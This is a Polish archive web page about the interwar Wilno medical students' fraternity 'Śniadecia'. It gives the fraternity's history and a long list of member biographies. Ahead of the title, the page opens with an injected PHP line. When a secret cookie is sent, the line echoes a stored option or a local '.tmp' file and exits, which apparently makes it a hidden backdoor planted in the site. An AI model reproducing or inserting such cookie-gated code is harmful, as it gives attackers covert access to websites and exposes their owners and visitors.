if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Śniadecia

Dekiel Alfonsa Prusa. Nazwa:
Polska Akademicka Korporacja „Śniadecia”
Siedziba:
Wilno
Data powstania:
maj 1926 r.
Barwy:
bordowo – złoto – ciemnozielona
Dewiza:
„Prawda, Dobro i Piękno” (?) „Wszystko dla dobra ludzkości” (?)

Rys historyczny

Zaproszenie na Wieczór Śniadecczyków dnia 2 II 1932 r. w salach Ogniska Akademickiego, Wilno.

Śniadecia powstała w maju 1926 r. Była korporacją wydziałową i przyjmowała w swoje szeregi tylko studentów Wydziału Lekarskiego Uniwersytetu Stefana Batorego.

Należała do korporacji chrześcijańskich i od 1926 r. była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Szczególnym celem Śniadecii było propagowanie na wschodnich kresach Rzeczypospolitej “idei morskiej”, świadomości znaczenia morza dla rozwoju kraju.

Śniadecja, Wilno 1933 r.

Kuratorem Śniadecii z ramienia Uniwersytetu był prof. Aleksander Januszkiewicz, a siedziba mieściła się przy ul. Wiłkomierskiej 1/4 w Wilnie (1935/36).

Całkowita ustalona, niekompletna imienna liczba członków obejmuje 50 nazwisk, w tym trzech członków honorowych.

Brak wiadomości dotyczących powojennej działalności Korporacji i spotkań jej członków.
Fidułka (?) Śniadecii, Wilno koniec lat 20-tych (?).

Lista członków

Poniższa, niekompletna lista członków Śniadecii obejmuje kilkadziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Aleksander Januszkiewicz, (17 lutego 1872 we wsi Zarudyńce k. Niemirowa - 24 grudnia 1955 w Kaliszu) ojciec Stanisława (Śniadecja), w czasie studiów członek Korporacji w Kijowie, lekarz, naukowiec, przewodniczący Wileńskiego Towarzystwa Lekarskiego 1923-39, rektor USB 1930-32, Filister honorowy Śniadecji 1928
 2. Jan Szmurło, (5 czerwca 1867 w Miedznie - 1 maja 1952 w Łodzi) lekarz, otolaryngolog, balneolog, historyk medycyny, kierownik Katedry i Kliniki Otolaryngologicznej i dziekan Wydziału Lekarskiego USB, Filister honorowy Śniadecji 1928, po wojnie kierownik Katedry Historii Medycyny UŁ i AM w Łodzi oraz Biblioteki Głównej AM
 3. Julian Juliusz Szymański, (10 maja 1870 w Kielcach - 8 czerwca 1958) ojciec Lecha (Konwent Polonia), absolwent med. Uniwersytet w Kijowie, tamże asystent w klinice okulistycznej 1891-98, uczestnik rewolucji 1905, uciekając przed represjami emigrował do Stanów Zjednoczonych, gdzie kontynuował pracę naukową, prof. Uniwersytetu w Kurytybie w Brazylii 1916-20, opublikował pierwszy w języku portugalskim podręcznik okulistyki, który ukazał się też w języku polskim (Okulistyka w skróceniu, 1920), od 1922 prof. okulistyki USB, pierwszy kurator i Filister honorowy Piłsudii, Filister honorowy Śniadecji 1928, senator i marszałek Senatu z ramienia BBWR 1928-30

Członkowie rzeczywiści

 1. Julian Adach, (22 luty 1900 we Franciszkowie w Lubelskiem - 1977), członek Śniadecji (?), później Conradii (?), lekarz med. USB 1932
 2. Antonowicz,

  Jan Bagan, 1938 r.

 3. Jan Bagan, (15 października 1901 w Sidrze pow. Sokółka - 13 października 1979 w Białymstoku) absolwent Gimnazjum w Grodnie, student medycyny USB, odbył roczne przeszkolenie w podchorążówce Korpusu Sanitarnego w Warszawie 1928/29, lekarz med. USB 1932, pracował jako lekarz kolejowy m.in. w Wilnie, Pińsku, Czeremsze, aresztowany przez Rosjan i skazany na pięć lat jako wróg ludu, przed wywózką uchronił go wybuch wojny niemiecko-radzieckiej w 1941, po wojnie m.in. w Dyrekcji Okręgowej Kolei Państwowej w Olsztynie, poddyrekcji w Białymstoku, następnie ordynator w szpitalu kolejowym na oddziale ginekologiczno-położniczym oraz kierownik Obwodowej Przychodni Lekarskiej PKP w Białymstoku

 4. Eugeniusz Bagiński, ( - 1944) zginął w powstaniu warszawskim
 5. Aleksander Balc, (3 lipca 1914 w Mińsku Litewskim - 2 kwietnia 2002) lekarz med. USB 1939, ftyzjatra, po wojnie lekarz w Szczecinie

  Jan Bassak, 1938 r.

 6. Jan Bassak, (26 listopada 1913 - 8 listopada 1967) lekarz

  Józef Borsuk, po 1959 r.

 7. Józef Borsuk, (26 lipca 1913 w Łońsku w pow. dziśnieńskim - 22 października 1988 w Łodzi) s. Ottona i Marii z Sendzikowskich, uczeń Gimnazjum oo. Jezuitów 1923-28 oraz Gimnazjum im. Adama Mickiewicza 1929-33, członek ZHP, student i absolwent 1939 med. USB, działał w Kole Medyków Studentów USB i Bratniej Pomocy, od 1935 pracował jako zastępca młodszego asystenta w Zakładzie Histologii i Embriologii USB, hospitant 1936-37, a następnie młodszy asystent 1937-39 Kliniki Otolaryngologicznej USB, w 1940 odbył roczny staż lekarski w szpitalu Kolejowym na Wilczej Łapie w Wilnie, od 1945 pracował najpierw w Białymstoku, a od kwietnia 1945 w Łodzi, od czerwca 1945 starszy asystent w Klinice Otolaryngologii UŁ, dr med. 1948, habilitacja 1955 AM w Łodzi, od kwietnia 1959 powołany do wojska jako kierownik Katedy Otolaryngologii z Kliniką i Pododdziałem Chirurgii Szczękowej WAM, dziekan Wydziału Lekarskiego WAM 1959-64, prof. nadzw. 1962, do 1965 pełnił obowiązki naczelnego otolaryngologa LWP, w 1974 przeniesiony w stan spoczynku w stopniu pułkownika, autor lub współautor 70 prac naukowych, członek Łódzkiego Towarzystwa Naukowego i Polskiego Towarzystwa Otolaryngologicznego, od 1983 członek honorowy Towarzystwa, członek zarządu 1963-66, a następnie prezes 1966-88 Oddziału Łódzkiego PCK, od 1984 członek honorowy, odznaczony m.in. Krzyżem Kawalerskim i Krzyżem Komandorskim OOP, Srebrnym i Złotym Krzyżem Zasługi, Medalem KEN, Odznaką Honorową PCK, odznakami honorowymi Miasta Łodzi i Wojwództwa Łódzkiego, pochowany na Cmentarzu Wojskowym w Łodzi

  Jerzy Borysowicz, koniec lat 20-tych.

 8. Jerzy Borysowicz, (28 kwietnia 1903 w Antopolu na ziemi witebskiej - 5 marca 1980) s. Franciszka i Rozalii z Jermołowiczów, absolwent szkoły powszechnej w Leplu, od 1914 uczeń Gimnazjum w Połocku, absolwent Gimnazjum w Ostrogu nad Horyniem 1923, harcerz, żołnierz 30 Pułku Strzelców Kaniowskich, student med. USB 1923-29, lekarz med. 1929, po studiach asystent w Klinice Neurologii w Wilnie, 1931-34 studia na UD, 1934-39 asystent i adiunkt w Klinice Chorób Nerwowych i Umysłowych USB, dr med., po wybuchu wojny 1939 osiedlił się w Radomiu, kierownik Przytułku dla Umysłowo Upośledzonych i Domu Starców, w czasie okupacji zaangażowany w pomoc dla ruchu oporu oraz ukrywających się Żydów (m.in. szefa Żydowskiej Organizacji Bojowej Mordechaja Anielewicza), a po 1945 po przekształceniu Przytułku ordynator Oddziału Psychiatrycznego Szpitala św. Kazimierza, w 1955 organizator i ordynator 1955-67 Oddziału Neurologicznego Szpitalu Miejskiego w Radomiu, autor 20 prac naukowych, od 1967 pracował w Poradni Zdrowia Psychicznego w Radomiu, odznaczony m.in. Krzyżem Kawalerskim OOP, Medalem X-lecia PRL, Odznaką za Wzorową Pracę w Służbie Zdrowia, jego imieniem nazwano jedną z ulic w Radomiu, w 1985 otrzymał pośmiertnie przyznany przez Yad Vashem medal “Sprawiedliwy wśród narodów świata”, pochowany w podradomskim Małęczynie

  Włodzimierz Brühl, pierwsza połowa lat 30-tych.

 9. Włodzimierz Brühl, (24 grudnia 1913 w St. Petersburgu -22 grudnia 2004 w Warszawie) absolwent Gimnazjum im. Króla Zygmunta Augusta w Bydgoszczy 1931, lekarz med. USB 1937 (1938?), uczestnik wojny obronnej 1939, ciężko ranny podczas nalotu na pociąg sanitarny, reumatolog, dyrektor Instytutu Reumatologii 1961-73, a następnie wieloletni kierownik Kliniki Chorób Narządu Ruchu, prof. zw. medycyny 1973, współtwórca polskiej reumatologii, autor ponad 85 prac naukowych i podręczników

 10. Tadeusz Bryńczak, (17 maja 1913 w Łomży - 1987) lekarz med. USB 1939
 11. Cagara (?),

  Walter Cebulski, 1990 r.

 12. Walter (Władysław) Cebula (po wojnie Cebulski), (22 października 1913 w Kupnie pow. Kolbuszowa - 17 czerwca 2011 w Chicago) s. Ludwika i Katarzyny z d. Mazan, absolwent Gimnazjum im. R. Traugutta w Brześciu n/Bugiem 1933 oraz Szkoły Podchorążych 82 Pułku Piechoty w Brześciu n/Bugiem 1934, student med. USB 1934-39, c. 1934, ppor. rez., w wojnie obronnej 1939 dowódca plutonu przeciwpancernego w 78 Pułku Piechoty, m.in. w walkach pod Kobryniem i Kockiem, w niewoli niemieckiej w oflagach Arnswalde II B i Gross Born II D 1939-45, po wojnie na emigracji w Belgii a od 1953 w Stanach Zjednoczonych, dr med. Uniwersytet w Brukseli 1947, dyrektor kliniki Societe des Secours aux Polonais w Brukseli, a także pracownik Centrum Transfuzji Krwi oraz belgijskiego Czerwonego Krzyża 1949-53, lekarz Jackson Park Hospital oraz Saint Mary of Nazareth Hospital Center w Chicago 1953, a od 1954 prowadził prywatną praktykę lekarską w Chicago, emigracyjny działacz społeczny, prezes Związku Lekarzy Polskich 1974-89, przewodniczący komisji lekarskiej dla pomocy lekarskiej w Polsce, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago, odznaczony Medalem “Gloria Medicinae”, Srebrnym Krzyżem Zasługi, Krzyżem za Wolność i Niepodległość, Medalem “Za udział w wojnie obronnej 1939″, awansowany na stopień kapitana

  Wacław Chilmończyk, 1938 r.

 13. Wacław Jan Chilmończyk, (4 kwietnia 1917 w Salem w Stanach Zjednoczonych - 8 października w Toledo w Stanach Zjednoczonych) s. Antoniego i Michaliny z d. Żukowska, absolwent Gimnazjum im. Adama Mickiewicza w Wilnie, student med. USB 1936-40, w maju 1940 wyjechał do Stanów Zjednoczonych, w armii amerykańskiej 1941-45, nawigator bombowca, walczył we Włoszech 1944, absolwent med. Harvard 1948, pracował w szpitalach Uniwersytetu w Cleveland (Ohio) 1948-50 oraz szpitalu w Framingham (Massachusetts) 1950-52, później prowadził praktykę prywatną w Toledo (Ohio) 1953-76

 14. Janusz Chmielewski, (27 lipca 1913 w Warszawie - ) lekarz med. USB 1939, dr med. Warszawa 1952, ginekolog-położnik
 15. Adolf Chwilino,
 16. Władysław Domysławski, (10 maja 1911 w St. Petersburgu - lata 90-te) lekarz med. USB 1938, chirurg i ginekolog

  Aleksander Drobniak, ok. 1936 r.

 17. Aleksander Drobniak, (5 sierpnia 1910 w Dziombrowie pow. Szczuczyn - 1976) uczeń Gimnazjum Męskiego im. A. Mickiewicza w Grodnie, student medycyny USB 1929-38, lekarz med. Gdańsk 1953 (?)

 18. Wacław Dzieszko, (4 września 1901 w Lidzie - 10 grudnia 1971 w Białymstoku) prezes Koła Medyków 1928/29, figuruje w spisach Śniadecii (?) i Leonidanii (?), prezes 1929/30 i olderman 1930 Leonidanii, lekarz med. USB 1932, ginekolog, dr med. Warszawa 1951, prof. AM w Białymstoku
 19. Wacław Gancewicz, lekarz
 20. Zygmunt Głodkowski (Głodnowski),
 21. Stefan Gnoiński,

  Ludwik Grabowski.

 22. Ludwik Grabowski, (11 maja 1910 w Kramarzewie w woj. białostockim – 10 maja 1966 w Radomsku) s. Władysława i Heleny z Klimaszewskich, absolwent Gimnazjum w w Łomży, student i absolwent 1936 Wydziału Lekarskiego USB, po studiach skierowany do pracy na Wołyniu,od 1936 w szpitalu powiatowym w Równem, potem Ambulatorium Ubezpieczalni Społecznej w Aleksandrii, powtórnie w szpitalu w Równem, następnie w szpitalach w Hrubieszowie i Zamościu, lekarz wojskowy w Ostrowcu Świętokrzyskim, od października 1945 kierownik Szpitala Miejskiego w Kowarach, od października 1949 ordynator - chirurg oddziału w sanatorium przeciwgruźliczym w Bukowcu k/Kowar, chirurg płucny w sanatorium przeciwgruźliczym w Tuszynku k/Łodzi 1952-59, ordynator oddziału w Szpitalu Powiatowym w Radomsku 1959-1966, pochowany na Starych Powązkach w Warszawie

 23. Stanisław Januszkiewicz, (8 czerwca 1903 w Kijowie - 7 października 1979 w Krakowie) s. Aleksandra (lekarza, rektora USB, F! honorowego Śniadecji) i Janiny z Peszyńskich, student Wydział Sztuk Pięknych, a następnie Wydziału Lekarskiego USB, dr med. USB 1928, odbył szkolenia w zakresie radiologii w ośrodkach zagranicznych we Wiedniu, Paryżu, Londynie, Berlinie i Eindhoven, habilitacja tamże 1939, prof. i kierownik Katedry Radiologii Śląskiej AM w Zabrzu 1949-56, prof. 1957-73 i prorektor 1964-71 AM w Krakowie (obecnie Collegium Medicum UJ), odznaczony Krzyżem Komandorskim OOP, Krzyżem Oficerskim OOP, Złotym Krzyżem Zasługi i Złotą Odznaką za pracę społeczną dla miasta Krakowa, pochowany na Cmentarzu Salwatorskim w Krakowie
 24. Jan Jurek, (14 maja 1905 w Godowie w Kieleckiem - ) lekarz med. Wilno 1943, radiolog
 25. Henryk Kałużyński,
 26. Stanisław Kamiński,

  Zygmunt Kanigowski, pierwsza połowa lat 30-tych.

 27. Zygmunt Kanigowski, (8 lipca 1909 w Wading-Riel w Stanach Zjednoczonych - 1968) lekarz med. USB 1934, dr med. Gdańsk 1951, neurolog i psychiatra, prof. AM w Białymstoku, kierownik Kliniki Chorób Nerwowych AM

 28. Aleksander Krawczuk, (8 kwietnia 1913 w Białymstoku - 1985) lekarz med. USB 1938, dr med. Poznań 1950, ginekolog, prof. AM w Białymstoku
 29. Ludwik Kromer (?),

  Bolesław Kuźma, prawd. początek lat 30-tych.

 30. Bolesław Antoni Kuźma, (1910-1966) lekarz med. Lublin 1946

 31. Edward Lipiński, (8 marca 1910 w Charkowie - ) lekarz med. USB 1938, pediatra
 32. Jerzy Łyżwa,
 33. Feliks Oleński, (7 listopada 1905 w St. Petersburgu -1964) lekarz med. USB 1931, chirurg

  Jan Paradowski, pierwsza połowa lat 30-tych.

 34. Jan Paradowski, ( - 1939-45) zabity przez Niemców

 35. Marian Pelc, wiceprezes Koła Wileńskiego MW 1936 i 1936/37, lekarz

  Alfons Prus, 1933 r.

 36. Alfons Prus, (27 lipca 1911 w Białymstoku - 22 marca 1987 w Białymstoku) s. Kazimierza i Aleksandry z d. Baks, absolwent Gimnazjum im. Zygmunta Augusta w Białymstoku, student i absolwent med. USB 1930-38, stażysta w szpitalu w Równem, a następnie lekarz lubelskiej Ubezpieczalni Społecznej w Lubartowie, w wojnie obronnej 1939 lekarz w szpitalu polowym przy I Dywizji Legionów na froncie Prusy Wschodnie, a po jej rozbiciu lekarz pułkowy w 82 i 83 Pułku Piechoty w Zgrupowaniu “Kobryń” w SGO “Polesie”, dostał się do niewoli niemieckiej w rejonie wsi Wola Gułowska, więziony w obozie jenieckim w Radomiu, z którego uciekł, w czawie okupacji lekarz w Lubartowie, członek AK, lekarz oddziałów partyzanckich, aresztowany w 1941 przez Gestapo i wywieziony do obozu koncentracyjnego w Auschwitz, zwolniony 1942, zmobilizowany 16 IX 1944 i mianowany ordynatorem oddziału Szpitala Ewakuacyjnego przy I Armiii LWP , a od kwietnia 1945 lekarz Szpitala Garnizonowego w Lublinie, uzyskał specjalizację z zakresu laryngologii, mimo ponawianych zachęt nie wstąpił do PZPR, w stopniu podpułkownika przeszedł na wcześniejszą emeryturę wojskową, od 1966 mieszkał w Białymstoku

 37. Witold Putkowski, ? lekarz, chirurg (?), pracował w Szpitalu Wojskowym na Antokolu, miał mieć amerykański paszport, działał w konspiracji [brak w spisach, wpis na podstawie relacji Elżbiety Sędrowicz, fotografii i zdjęcia czapki]
 38. Józef Roszkowski (Rosznowski), (1913? - 8 listopada 1979) pochowany na warszawskich Powązkach (P-Q-5-1)
 39. Wiktor Sadowski, przyrodnik
 40. Bohdan Sielicki, lekarz
 41. Wiktor Słabnowicz,
 42. Kazimierz Stańczuk, (3 marca 1907 w Łomży - 1979 w Białymstoku) s. Mikołaja i Stanisławy, absolwent Gimnazjum w Łomży, lekarz med. USB 1936, chirurg, po wojnie m.in. dyrektor szpitala powiatowego w Grajewie 1945-70, odznaczony m.in. Złotym Krzyżem Zasługi
 43. Wacław Szpilewski, (20 września 1900 w Tołkaczewszyźnie - 1972) lekarz med. USB 1930, internista

  Józef Świtek, prawd. początek lat 30-tych.

 44. Józef Świtek, (10 grudnia 1908 w miejsc. Krężnica Jara pow. Lublin - 1973) lekarz med. USB 1936, dr med. Lublin 1946, laryngolog, prof. (?) AM w Lublinie

  Leon Uszkiewicz, lata 30-te.

 45. Leon Uszkiewicz, (18 lutego 1905 w Pogorendzie w pow. grodzieńskim - 30 kwietnia 1952) s. Floriana i Józefy z d. Teżyk, student i absolwent 1934 med. USB, lekarz psychiatra w szpitalu w Chełmie 1935-37, a następnie w Tworkach 1937-41, w czasie okupacji usunięty ze szpitala tworkowskiego, pracował w prywatnym sanatorium dla chorych psychicznie we Wrzesinie, w czasie powstania warszawskiego lekarz w Szpitalu Jana Bożego, od 1945 dyrektor Departamentu Medycyny Społecznej w Ministerstwie Zdrowia, dyrektor Państwowego Zakładu Wydawnictw Lekarskich, red. naczelny tygodnika “Służba Zdrowia”, od 1945 członek PPR, pochowany na cmentarzu przyszpitalnym w Tworkach k. Pruszkowa

 46. Eugeniusz Waszczuk, (7 października 1909 w Krzyczewie pow. Biała Podlaska - ) lekarz med. USB 1936, ginekolog, dyrektor Szpitala im. Kopernika w Toruniu i ordynator oddziału ginekologiczno-położniczego
 47. Mieczysław Wasilewski, lekarz
 48. Stanisław Węcławski,
 49. Tadeusz Pius Wiszniewski, (5 maja 1914 w Żółkiewcu na Lubelszczyźnie - 1973) lekarz med. USB 1939, dr med. Gdańsk 1950, chirurg, adiunkt Kliniki Chirurgii AM w Gdańsku

Listę członków opracowano na podstawie:

1) Zbigniew Kuczyński, Członkowie K! Śniadecia, rękopis,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Śniadecia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 7 XI 2021 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Akademicka Korporacja „Śniadecia” (Wilno), (na:) www.archiwumkorporacyjne.pl, stan 7 XI 2021 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }